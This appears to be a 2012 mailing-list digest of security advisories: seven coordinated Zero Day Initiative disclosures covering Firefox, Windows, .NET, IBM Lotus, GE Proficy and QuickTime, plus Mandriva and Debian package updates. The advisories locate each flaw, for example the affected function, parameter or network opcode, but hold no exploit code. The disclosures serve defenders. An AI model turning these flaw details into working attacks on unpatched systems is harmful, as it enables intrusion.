ZDI-12-128 : Mozilla Firefox nsHTMLSelectElement Remote Code Execution Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ZDI-12-128 : Mozilla Firefox nsHTMLSelectElement Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-128 August 3, 2012 - -- CVE ID: CVE-2011-3671 - -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P - -- Affected Vendors: Mozilla - -- Affected Products: Mozilla Firefox - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12460. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com - -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mozilla Firefox. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within nsINode::ReplaceOrInsertBefore() in content/base/src/nsGenericElement.cpp. A use-after-free condition can be triggered by adding an already parented option element to an option collection and then removing its associated select element during an event handler execution. Successful exploitation of this vulnerability will lead to code execution in the context of the browser. - -- Vendor Response: Mozilla has issued an update to correct this vulnerability. More details can be found at: https://bugzilla.mozilla.org/show_bug.cgi?id=335998 - -- Disclosure Timeline: 2011-12-07 - Vulnerability reported to vendor 2012-08-03 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * regenrecht - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -BEGIN PGP SIGNATURE- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBUBwnsVVtgMGTo1scAQIaWQf7BZ+Yc7GrNbsgyzXp2W3Uqu94N4Vwfxy0 zF6u1dZwhM6jaCEBMvgzhJSvtwxnj8oGZ8f1yx/MkC8idp7D8jMx/+whpUsZMTDi Rl1tTWpgiaZLc2voPUddM3cmciwxHq7lBVcxecDp3yk2JXAC8eNXlhs6bhhTT4Sq Iw7IoDjWoYxEEQh6ghcU+QA51BYhhVyP/DzMlUBpyLCwxlo1jgJ30xSyFWeNkUmi e/tqTSIBbxCLs2lCpnRNc6JJgSx0617Gv/I7wagKH65FdPLTrGgGZEd1o5n251UL umFB7kR7xBRmJcsaElQzuwad8yU/xARuch6hJVf4XMMJ2HdOC7zJqg== =zVBZ -END PGP SIGNATURE-
ZDI-12-129 : Microsoft Windows TrueType Font Parsing Remote Code Execution Vulnerability (Remote Kernel)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ZDI-12-129 : Microsoft Windows TrueType Font Parsing Remote Code Execution Vulnerability (Remote Kernel) http://www.zerodayinitiative.com/advisories/ZDI-12-129 August 3, 2012 - -- CVE ID: CVE-2012-0159 - -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C - -- Affected Vendors: Microsoft - -- Affected Products: Microsoft Windows XP SP3 Microsoft Windows Vista Microsoft Windows 7 - -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code from the contact of kernelspace on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the kernel's support for TrueType font parsing of compound glyphs. A sign extension error exists in win32k.sys when processing compound glyphs having a total number of contours above 0x7FFF. This can be exploited to corrupt kernel heap memory placed below the space allocated for the flags buffer and potentially execute arbitrary code in kernel space. - -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://technet.microsoft.com/en-us/security/bulletin/ms12-039 - -- Disclosure Timeline: 2011-11-04 - Vulnerability reported to vendor 2012-08-03 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * Alin Rad Pop (binaryproof) - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -BEGIN PGP SIGNATURE- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBUBwqM1VtgMGTo1scAQKiCgf/d6FeYgGgRzwbN+PfzCyA7jU2TMEZzomm sCTQAOD+hpQGzwGk/gsZtbvh0NqzFtfoQ968pyrNHpA+x8B0ORry2C9v351Spz5E hnqxeOUd7IFnrjxcGLBMDBwFGVWeyTJTpT9oEW+sXNnDNy/Dcjok7LWlI+M4cvKa fB9XE7yT+qST/HLjYezvc8iazrJOxqeh4YYflrST7cCmAzqojcXSpZXYZxqgliuU OChxDT2QpWOyyY6y6dQKE/nVtC5kHT61sNjCVURtTSzPuZgjv6fbOqCrUW8OsOwC EzYTDrMpeWMP5FwzfnICPTK9nWp/hsHuV/BunebzjExdwrFu00u2jg== =bMzV -END PGP SIGNATURE-
ZDI-12-131 : Microsoft .NET Framework Undersized Glyph Buffer Remote Code Execution Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ZDI-12-131 : Microsoft .NET Framework Undersized Glyph Buffer Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-131 August 3, 2012 - -- CVE ID: CVE-2012-0162 - -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P - -- Affected Vendors: Microsoft - -- Affected Products: Microsoft .NET - -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the .NET Framework. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within Microsoft .NET handling of XAML Browser Applications (XBAP) graphics components. It is possible to cause an undersized allocation for a buffer which is populated with user-supplied glyph data, resulting in memory corruption which can be leveraged to remotely execute code. - -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://technet.microsoft.com/en-us/security/bulletin/ms12-034 - -- Disclosure Timeline: 2011-12-07 - Vulnerability reported to vendor 2012-08-03 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * Vitaliy Toropov - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -BEGIN PGP SIGNATURE- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBUBwrLlVtgMGTo1scAQL3jAf/U9T6mxWrH5pqT77gThXFsNAKdT0hqVV7 bqMapoc0minh05LMm9wm7m5kkZIO57U6RlnRdm81cvI3j4OUHbWPX34SFAxu2xgS fGHgwoZsGyTruR32VDqp1ZuJsN3qKc7ydk7KXt0E/HX57hBK6TCN25Cyiivj7Pmy uux8k0+TZ/L3/ZryhRLololNOMKZ6hXwNXjFCzNhfWQLUT6JWrIlYUycxxge5ICQ f4ZEy2qMypRf9yj6FyqTS0WiIEg5FtTl6jk2agswHO3FN+8lM1R8pSHLNve/FAOr UNPruwZ9bRlIe28mEH60dXciRPVxYTcj9suY1ejfGRq2JvxkrWA5Uw== =VUCP -END PGP SIGNATURE-
ZDI-12-132 : IBM Lotus iNotes dwa85W ActiveX Attachment_Times Remote Code Execution Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ZDI-12-132 : IBM Lotus iNotes dwa85W ActiveX Attachment_Times Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-132 August 3, 2012 - -- CVE ID: CVE-2012-2175 - -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P - -- Affected Vendors: IBM - -- Affected Products: IBM Lotues iNotes - -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM Lotus iNotes. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the dwa85W.cab ActiveX control. When passing a long string argument to the Attachment_Times parameter during the control instantiation it is possible to overflow a stack buffer causing memory corruption. This can be leveraged by an attacker to execute code under the context of the user running the browser. - -- Vendor Response: IBM has issued an update to correct this vulnerability. More details can be found at: http://www-304.ibm.com/support/docview.wss?uid=swg21596862 - -- Disclosure Timeline: 2011-12-07 - Vulnerability reported to vendor 2012-08-03 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * Gaurav Baruah of eSecForte Technologies Pvt. Ltd - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -BEGIN PGP SIGNATURE- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBUBwrkVVtgMGTo1scAQLDoAf+IZ1F4hevyOm+7M8TYeEdzc6E/dBa3TG4 5INgrgsCo6dr1xasyofkFx0k2Svv102GOwcxPMNY+joIz0EXUK94Ky2SKEzya9Lu owePlf45Lv87dOxJFlWuuqKQb3KIKAnD27fVn5rD2hO/Jv/e14+wof0iOA9ttIKP klINomKgNetXHSlXtj+5t/euOUA5YGfvfL9mfTdss/ZG92M1zsdxx95Mr08Lk4xX DJPErUq/2IajpCEH5LXVWStUyDO/XvkytLA+XG5DxXWUmavqwcsohDu1faYCje9O s0ta/smSKccMCazFEfsZX/0GAsvSjdZ7CkpR7EJvHajfzx27lOM8BA== =VJ4A -END PGP SIGNATURE-
ZDI-12-133 : GE Proficy Historian ihDataArchiver.exe Multiple Opcode Parsing Remote Code Execution Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ZDI-12-133 : GE Proficy Historian ihDataArchiver.exe Multiple Opcode Parsing Remote Code Execution Vulnerabilities http://www.zerodayinitiative.com/advisories/ZDI-12-133 August 3, 2012 - -- CVE ID: CVE-2012-0229 - -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C - -- Affected Vendors: GE - -- Affected Products: GE Proficy Historian ihDataArchiver - -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of GE iFix. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ihDataArchiver.exe process which listens by default on TCP port 14000. Several errors are present in the code responsible for parsing data from the network. By providing malformed data for opcodes 6, 7, 8, 10, and 12 the process can be made to corrupt memory which can lead to arbitrary code execution in the context of the user running the service. - -- Vendor Response: GE has issued an update to correct this vulnerability. More details can be found at: http://support.ge-ip.com/support/index?page=kbchannelid=S:KB14767 - -- Disclosure Timeline: 2011-10-17 - Vulnerability reported to vendor 2012-08-03 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * Luigi Auriemma - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -BEGIN PGP SIGNATURE- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBUBwr11VtgMGTo1scAQLJgQf/ch8WS423yg6HqmDf02bbhylP979o5mVq k6XN4d0u0bl6oa74wadnd0ch1iZE70b9icervXe2IEdaZEQenQ9nOYBGdXg+/Sr7 V5qOvm+gOUT3kta9ogW8RLO5gZnMjA0MnY68laphjuTFqVaz0w24D+NjrxflR0IL WT0s2ct0S6L5MvVYQWYse/dLqr3KGuY1YaTkDfALwjXXDRv9UYf+4QMgDD2Jw0+f qRqlTUhe8iEdju/mstYLNsZ6g4plUFvs9piBmZG82K5NsxZjyX8GHuWv48siQbUP hlreFBPJ89cvqVX9ap+5AlioJkWPg8bGuK80jpStIJFYjy6aY4u13Q== =L3hq -END PGP SIGNATURE-
ZDI-12-134 : IBM Lotus Quickr QP2 ActiveX _Times Remote Code Execution Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ZDI-12-134 : IBM Lotus Quickr QP2 ActiveX _Times Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-134 August 3, 2012 - -- CVE ID: CVE-2012-2176 - -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P - -- Affected Vendors: IBM - -- Affected Products: IBM Lotus Quickr - -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM Lotus Quickr. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the QP2.cab ActiveX control. When passing a long string argument to the Attachment_Times or Import_Times parameters during the control's instantiation it is possible to overflow a stack buffer causing memory corruption. This can be leveraged by an attacker to execute code under the context of the user running the browser. - -- Vendor Response: IBM has issued an update to correct this vulnerability. More details can be found at: http://www-01.ibm.com/support/docview.wss?uid=swg21596191 - -- Disclosure Timeline: 2011-11-29 - Vulnerability reported to vendor 2012-08-03 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * Gaurav Baruah of eSecForte Technologies Pvt. Ltd - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -BEGIN PGP SIGNATURE- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBUBwsSVVtgMGTo1scAQL/egf/QwYro6VmqvYm9h0AX3jOHnbmH4zo5dC1 ld+ILONNZW7IFGo7j/Gsp2IeNEJcbZeNcuPTjhAIbm3ky4kQJsRzXJp6d6B0BHRD eHgHbSqTpLmvX0F3J0xQMC2jDaPnvHUVJ+ExTQVQMKnOTPwtvn4kWoDwoQypoQRz 5/32ZZkGwzat23/QOY0gj6+maalukgvmb+2pXsMxLJIKRCP2qyvWoJQh7D0IJ+Og CXHfOam5T1SqavZgCFEBEGZc093MgIc2jZviRApZezUW29ckwpoktCGqzTQi+qbq jTW43jsp77Fwj2ZeG6xBVYwRa3t2nxR5MPWT6j0H+Co4vVei/a3Nqg== =IGE9 -END PGP SIGNATURE-
ZDI-12-135 : Apple QuickTime JPEG2k Sample Size Atom Remote Code Execution Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ZDI-12-135 : Apple QuickTime JPEG2k Sample Size Atom Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-135 August 3, 2012 - -- CVE ID: CVE-2012-0661 - -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P - -- Affected Vendors: Apple - -- Affected Products: Apple QuickTime - -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the way Apple QuickTime handles movies with the jpeg2k codec. When the size for a sample defined in the stsz atom is too big the QuickTime player fails to allocate the required memory for that sample. A pointer to the previous sample data still exists after the previous sample got freed. This pointer normally gets updated to point to the current sample data, but this does not happen when the allocation fails. The QuickTime player then re-uses the stale pointer and a use-after-free situation occurs. This can lead to remote code execution under that context of the current process. - -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT1222 - -- Disclosure Timeline: 2011-11-29 - Vulnerability reported to vendor 2012-08-03 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * Damian Put - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -BEGIN PGP SIGNATURE- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBUBwsnlVtgMGTo1scAQKEnwf9GAYOfc9ZSFXF6Im/trySm24x08qSirsT 8BFtEPk/7Sn6rBT5ml/kQx4XAmJCKfHz9vyYzmj5m9FF2xrdh2YPHOapkLI3yg4K JSoGfeHUP3nzVTAWUp+jXj3+OoM0XBA8illhCfGyOTe7juSV5T3BSXCIkOPdkWoD vw/tm811JUm9i7ek2eQyd8HM4WfI+PcdcSBwFLmzF6y0voV7Q/DSwwZ3D/Wof/bF KjprrQn5soKuxMeDt7F6x49L65SDeozdZLiBVk44USeykYWWATheF39WudQ2t+Mi 90sgcExl0hPpMz3eHKpFJ//KloamgJLnSTqPdmIM6Xs0BPrSLlqing== =sIB5 -END PGP SIGNATURE-
[ MDVSA-2012:123 ] libreoffice
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:123 http://www.mandriva.com/security/ ___ Package : libreoffice Date: August 4, 2012 Affected: 2011. ___ Problem Description: A Security issue was identified and fixed in libreoffice: Multiple heap-based buffer overflow flaws were found in the XML manifest encryption tag parsing code of LibreOffice. An attacker could create a specially-crafted file in the Open Document Format for Office Applications (ODF) format which when opened could cause arbitrary code execution (CVE-2012-2665). libreoffice for Mandriva Linux 2011 has been upgraded to the 3.5.5 version which is not vulnerable to this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2665 ___ Updated Packages: Mandriva Linux 2011: e4d80f4e1a3b66e44d2bf4ff51a741f6 2011/i586/libexttextcat0-3.3.1-0.1-mdv2011.0.i586.rpm ae26657344d66dc5c82c038852823418 2011/i586/libexttextcat-devel-3.3.1-0.1-mdv2011.0.i586.rpm 1331f8093683d2337a70451d5cb756fa 2011/i586/libexttextcat-tools-3.3.1-0.1-mdv2011.0.i586.rpm bea17fe12e63846b84103d559a77bc1a 2011/i586/libreoffice-3.5.5-0.1-mdv2011.0.i586.rpm 7ddb0fb0d9206d544b5edbe5da70445c 2011/i586/libreoffice-base-3.5.5-0.1-mdv2011.0.i586.rpm 3a6c10f62ebf13e2054dbc23a778c43b 2011/i586/libreoffice-calc-3.5.5-0.1-mdv2011.0.i586.rpm 058dc2c778c4f23ac244279c8a9d214f 2011/i586/libreoffice-common-3.5.5-0.1-mdv2011.0.i586.rpm 5d68fb2c604c01e3ec41a9f6a0d8a814 2011/i586/libreoffice-core-3.5.5-0.1-mdv2011.0.i586.rpm 14707fdf9bedcb5f55baa640a50ecf95 2011/i586/libreoffice-devel-3.5.5-0.1-mdv2011.0.i586.rpm bb2ee6c725a08f94db9355c7fdab4fff 2011/i586/libreoffice-devel-doc-3.5.5-0.1-mdv2011.0.i586.rpm 3abf4f3fce5f0a79aab797e05318018b 2011/i586/libreoffice-draw-3.5.5-0.1-mdv2011.0.i586.rpm 862d57df452de0f2cd83b35d739ec5b3 2011/i586/libreoffice-dtd-officedocument1.0-3.5.5-0.1-mdv2011.0.i586.rpm f941229155d48d8612854d58b60bdc6b 2011/i586/libreoffice-filter-binfilter-3.5.5-0.1-mdv2011.0.i586.rpm 9f1eb8f16abd95e9e1115dde5d00db80 2011/i586/libreoffice-gnome-3.5.5-0.1-mdv2011.0.i586.rpm e62b6207950bc19bf3b0283e22cbc644 2011/i586/libreoffice-help-bg-3.5.5-0.1-mdv2011.0.i586.rpm 65af8192cf4979ff81eb9d6d8dac851b 2011/i586/libreoffice-help-bn-3.5.5-0.1-mdv2011.0.i586.rpm 87d765e196f993a8d45e65cd0da6d751 2011/i586/libreoffice-help-bs-3.5.5-0.1-mdv2011.0.i586.rpm 0222a566b72889277a3ce7c893b6b207 2011/i586/libreoffice-help-ca-3.5.5-0.1-mdv2011.0.i586.rpm ca90c58e1d64d04a30034f1bf59bf6de 2011/i586/libreoffice-help-cs-3.5.5-0.1-mdv2011.0.i586.rpm ed0a4ab1f38e317f38348964eec68c67 2011/i586/libreoffice-help-da-3.5.5-0.1-mdv2011.0.i586.rpm 49adff0bca03d1db0275708646acfd22 2011/i586/libreoffice-help-de-3.5.5-0.1-mdv2011.0.i586.rpm 3e1b3c31228b691389f7e6afb8ccb5fc 2011/i586/libreoffice-help-dz-3.5.5-0.1-mdv2011.0.i586.rpm 2f284d532d5ea3f3da5960351d8cbbc8 2011/i586/libreoffice-help-el-3.5.5-0.1-mdv2011.0.i586.rpm 770b0113889aadecac11744361f1c309 2011/i586/libreoffice-help-en_GB-3.5.5-0.1-mdv2011.0.i586.rpm bafa4fffebd8967e04e78e7d6e89d0de 2011/i586/libreoffice-help-en_US-3.5.5-0.1-mdv2011.0.i586.rpm bddd699c95cbc702fd2e1e7d74e81b25 2011/i586/libreoffice-help-es-3.5.5-0.1-mdv2011.0.i586.rpm 13b48c5fc87589d6b459d3cac97e5359 2011/i586/libreoffice-help-et-3.5.5-0.1-mdv2011.0.i586.rpm 9ca753b6c94c6d4c65f964c4e768f1df 2011/i586/libreoffice-help-eu-3.5.5-0.1-mdv2011.0.i586.rpm 9a0253ebaf5b0fe110003f6e611bb8c7 2011/i586/libreoffice-help-fi-3.5.5-0.1-mdv2011.0.i586.rpm f4b96a9dbe93947e081a3107576f6fad 2011/i586/libreoffice-help-fr-3.5.5-0.1-mdv2011.0.i586.rpm 631a5f90448cde57ee4f018ac6300956 2011/i586/libreoffice-help-gl-3.5.5-0.1-mdv2011.0.i586.rpm bbfa1929824d26b530e754481009c3dc 2011/i586/libreoffice-help-gu-3.5.5-0.1-mdv2011.0.i586.rpm 8b2b1b8ab72125119cd24b7265c4ac25 2011/i586/libreoffice-help-he-3.5.5-0.1-mdv2011.0.i586.rpm 1ff5cd5e4897dc76cfeb92c6f4d7da0f 2011/i586/libreoffice-help-hi-3.5.5-0.1-mdv2011.0.i586.rpm e6403220aa62822acda3fc1aca3eaa58 2011/i586/libreoffice-help-hr-3.5.5-0.1-mdv2011.0.i586.rpm 77e28b8728380b5e6a7f28f887609e5f 2011/i586/libreoffice-help-hu-3.5.5-0.1-mdv2011.0.i586.rpm 0b79eeadcf977d60cf94187450373e35 2011/i586/libreoffice-help-it-3.5.5-0.1-mdv2011.0.i586.rpm ba68f4a9c7920ff47baca7b87364e13f 2011/i586/libreoffice-help-ja-3.5.5-0.1-mdv2011.0.i586.rpm ddca4ca6629abfdde17f331a7502e12f 2011/i586/libreoffice-help-ko-3.5.5-0.1-mdv2011.0.i586.rpm 37832c7935a479afaa9d8f8643a4ccfe
[SECURITY] [DSA 2521-1] libxml2 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2521-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff August 04, 2012http://www.debian.org/security/faq - - Package: libxml2 Vulnerability : integer overflows Problem type : remote Debian-specific: no CVE ID : CVE-2012-2807 Jueri Aedla discovered several integer overflows in libxml, which could lead to the execution of arbitrary code or denial of service. For the stable distribution (squeeze), this problem has been fixed in version 2.7.8.dfsg-2+squeeze5. For the testing distribution (wheezy) and the unstable distribution (sid), this problem has been fixed in version 2.8.0+dfsg1-5. We recommend that you upgrade your libxml2 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlAdWqcACgkQXm3vHE4uylpCeACfablFFsYGtP29hdxffKqUwg6j MrkAnAhfWbDo024e6rYfcrs2hrngEPh3 =Lr3B -END PGP SIGNATURE-
[ MDVSA-2012:124 ] openoffice.org
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:124 http://www.mandriva.com/security/ ___ Package : openoffice.org Date: August 4, 2012 Affected: Enterprise Server 5.0 ___ Problem Description: A Security issue was identified and fixed in openoffice.org: Multiple heap-based buffer overflow flaws were found in the XML manifest encryption tag parsing code of openoffice.org. An attacker could create a specially-crafted file in the Open Document Format for Office Applications (ODF) format which when opened could cause arbitrary code execution (CVE-2012-2665). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2665 ___ Updated Packages: Mandriva Enterprise Server 5: dffa3bacd8ebe7eb9fc50245333ee2ef mes5/i586/openoffice.org-3.1.1-0.10mdvmes5.2.i586.rpm 3858079254b920e543d394be7b1bb37a mes5/i586/openoffice.org-base-3.1.1-0.10mdvmes5.2.i586.rpm d8ebe6a2e23bdcfb245d47f79c53d2a0 mes5/i586/openoffice.org-calc-3.1.1-0.10mdvmes5.2.i586.rpm a7f6aa3439e1a3e1de60bcf5cb3a2c79 mes5/i586/openoffice.org-common-3.1.1-0.10mdvmes5.2.i586.rpm 210b9f6e62d64d2647301bebb17f7caa mes5/i586/openoffice.org-core-3.1.1-0.10mdvmes5.2.i586.rpm 704481a79993a02db478be728c75d92b mes5/i586/openoffice.org-devel-3.1.1-0.10mdvmes5.2.i586.rpm 3cfeea3af7b2a92bbb13334607667d49 mes5/i586/openoffice.org-devel-doc-3.1.1-0.10mdvmes5.2.i586.rpm 57286877b9f63ca0c440795380669b68 mes5/i586/openoffice.org-draw-3.1.1-0.10mdvmes5.2.i586.rpm 83021c43909beb609e22795fc7d49333 mes5/i586/openoffice.org-filter-binfilter-3.1.1-0.10mdvmes5.2.i586.rpm 37c928a145765f186688bedd12c452b3 mes5/i586/openoffice.org-gnome-3.1.1-0.10mdvmes5.2.i586.rpm 82d916073a42ce8dae05406436e2e90c mes5/i586/openoffice.org-help-af-3.1.1-0.10mdvmes5.2.i586.rpm 1fde531976f45799899bf1f58c54dc9d mes5/i586/openoffice.org-help-ar-3.1.1-0.10mdvmes5.2.i586.rpm 368871932673f14f530d44924de0a726 mes5/i586/openoffice.org-help-bg-3.1.1-0.10mdvmes5.2.i586.rpm 4e2c0ad2f87055fe3e2ccdc010948a67 mes5/i586/openoffice.org-help-br-3.1.1-0.10mdvmes5.2.i586.rpm d75b8b75abf921ac6dc6fb40d487ea25 